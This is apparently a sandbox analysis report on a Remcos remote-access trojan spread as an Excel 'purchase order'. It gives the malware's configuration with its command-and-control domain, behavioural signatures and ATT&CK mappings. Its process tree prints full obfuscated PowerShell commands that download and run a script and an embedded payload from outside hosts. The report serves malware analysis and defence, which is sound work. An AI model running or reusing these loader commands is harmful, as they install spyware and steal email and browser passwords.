remcos | 9eb3ac05340da70c56dc36e8beece9a7c052c945fc3ceade2c622c4defec54b3

Analysis

max time kernel
149s
max time network
148s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
20-01-2025 13:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Purchase Order sheet.xla.xls
Size

1.3MB
MD5

777464f57cb83a39b7324d1f7505b6d6
SHA1

25acb95ef77574c20002165e6b68526d7318acd1
SHA256

9eb3ac05340da70c56dc36e8beece9a7c052c945fc3ceade2c622c4defec54b3
SHA512

6609bfa04a5ae724eabd2f13c992a255554ae910ce6bcd6d25a62d8e2652d8aa129eae0908e266e3dfa808c19708a0a45c9b2922c531e03b1c2142847dbab8e3
SSDEEP

24576:pVH9M2HUO8Yfb3B/RvUp9EKDE/XY6lRvmfOdkGRjXv4cGysQYcb06hp8IJh1:LdMj/cb3I6Kg/ooofOdkGRXQcGTlczD

Score

10^/10

remcos zynova collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

zynova

millionairedreams2025.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-MGAETQ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/2736-222-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2744-218-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2764-217-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/2764-217-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/2744-218-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 5 IoCs

flow	pid	Process
20	2956	mshta.exe
21	2956	mshta.exe
23	2268	powershell.exe
25	2576	powershell.exe
26	2576	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2268	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2576	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2576 set thread context of 1888	2576	powershell.exe	40
PID 1888 set thread context of 2744	1888	CasPol.exe	43
PID 1888 set thread context of 2764	1888	CasPol.exe	44
PID 1888 set thread context of 2736	1888	CasPol.exe	45

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 2 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1712	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2268	powershell.exe
2268	powershell.exe
2268	powershell.exe
2576	powershell.exe
2744	CasPol.exe
2744	CasPol.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
1888	CasPol.exe
1888	CasPol.exe
1888	CasPol.exe
1888	CasPol.exe
1888	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	2736	CasPol.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 2956 wrote to memory of 2296	2956	mshta.exe	31
PID 2956 wrote to memory of 2296	2956	mshta.exe	31
PID 2956 wrote to memory of 2296	2956	mshta.exe	31
PID 2956 wrote to memory of 2296	2956	mshta.exe	31
PID 2296 wrote to memory of 2268	2296	cmd.exe	33
PID 2296 wrote to memory of 2268	2296	cmd.exe	33
PID 2296 wrote to memory of 2268	2296	cmd.exe	33
PID 2296 wrote to memory of 2268	2296	cmd.exe	33
PID 2268 wrote to memory of 1988	2268	powershell.exe	34
PID 2268 wrote to memory of 1988	2268	powershell.exe	34
PID 2268 wrote to memory of 1988	2268	powershell.exe	34
PID 2268 wrote to memory of 1988	2268	powershell.exe	34
PID 1988 wrote to memory of 1168	1988	csc.exe	35
PID 1988 wrote to memory of 1168	1988	csc.exe	35
PID 1988 wrote to memory of 1168	1988	csc.exe	35
PID 1988 wrote to memory of 1168	1988	csc.exe	35
PID 2268 wrote to memory of 1976	2268	powershell.exe	37
PID 2268 wrote to memory of 1976	2268	powershell.exe	37
PID 2268 wrote to memory of 1976	2268	powershell.exe	37
PID 2268 wrote to memory of 1976	2268	powershell.exe	37
PID 1976 wrote to memory of 2576	1976	WScript.exe	38
PID 1976 wrote to memory of 2576	1976	WScript.exe	38
PID 1976 wrote to memory of 2576	1976	WScript.exe	38
PID 1976 wrote to memory of 2576	1976	WScript.exe	38
PID 2576 wrote to memory of 1888	2576	powershell.exe	40
PID 2576 wrote to memory of 1888	2576	powershell.exe	40
PID 2576 wrote to memory of 1888	2576	powershell.exe	40
PID 2576 wrote to memory of 1888	2576	powershell.exe	40
PID 2576 wrote to memory of 1888	2576	powershell.exe	40
PID 2576 wrote to memory of 1888	2576	powershell.exe	40
PID 2576 wrote to memory of 1888	2576	powershell.exe	40
PID 2576 wrote to memory of 1888	2576	powershell.exe	40
PID 2576 wrote to memory of 1888	2576	powershell.exe	40
PID 2576 wrote to memory of 1888	2576	powershell.exe	40
PID 2576 wrote to memory of 1888	2576	powershell.exe	40
PID 1888 wrote to memory of 2932	1888	CasPol.exe	41
PID 1888 wrote to memory of 2932	1888	CasPol.exe	41
PID 1888 wrote to memory of 2932	1888	CasPol.exe	41
PID 1888 wrote to memory of 2932	1888	CasPol.exe	41
PID 1888 wrote to memory of 2800	1888	CasPol.exe	42
PID 1888 wrote to memory of 2800	1888	CasPol.exe	42
PID 1888 wrote to memory of 2800	1888	CasPol.exe	42
PID 1888 wrote to memory of 2800	1888	CasPol.exe	42
PID 1888 wrote to memory of 2744	1888	CasPol.exe	43
PID 1888 wrote to memory of 2744	1888	CasPol.exe	43
PID 1888 wrote to memory of 2744	1888	CasPol.exe	43
PID 1888 wrote to memory of 2744	1888	CasPol.exe	43
PID 1888 wrote to memory of 2744	1888	CasPol.exe	43
PID 1888 wrote to memory of 2764	1888	CasPol.exe	44
PID 1888 wrote to memory of 2764	1888	CasPol.exe	44
PID 1888 wrote to memory of 2764	1888	CasPol.exe	44
PID 1888 wrote to memory of 2764	1888	CasPol.exe	44
PID 1888 wrote to memory of 2764	1888	CasPol.exe	44
PID 1888 wrote to memory of 2736	1888	CasPol.exe	45
PID 1888 wrote to memory of 2736	1888	CasPol.exe	45
PID 1888 wrote to memory of 2736	1888	CasPol.exe	45
PID 1888 wrote to memory of 2736	1888	CasPol.exe	45
PID 1888 wrote to memory of 2736	1888	CasPol.exe	45

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Purchase Order sheet.xla.xls"
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1712

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2956
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2296
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2268
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sh60mh25.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1988
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E50.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4E4F.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1168
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1976
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA4ADgAMwAvADQAMgAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAzADcAMQAyADQAOQA4ADAAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAeQByAGUAdgBlAHIAbwBmAGwAawB1AGYAaQB0AHUAYQBlAGIAeQByAGUAdgBlAHIAYQBzAGwAcgBpAGcAdABoAGcAaQBuAC8AYgBrAGsALwBwAHAAbQBhAHgALwA3AC4ANQAxADIALgAwADEAMgAuADIAOQAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2576
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1888
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\yixowleigrkefwrav"
        7⤵
        
        PID:2932
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\yixowleigrkefwrav"
        7⤵
        
        PID:2800
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\yixowleigrkefwrav"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2744
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ilczwdxbuzcjhknenkard"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2764
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\lfprxwidihuwrqbiwuulowxy"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
1KB

MD5
e07f79cfc60a64b1393ccca4215c6b61

SHA1
887d9c2dd18cacb8138eb6567ca847ddc869acc0

SHA256
b82c53ebf221921245c7133c5ad0b389aca938a33cb4e401c25f2b80992db1e9

SHA512
04dae8ab035fe10f3ded2f853bd0b1736162729e3c30956c5baa2ff8eb8ca5df1937b16f68bfdb6599ed0874b8255b7845a360bcb913205a7a54a87e20c008f0

Download Submit
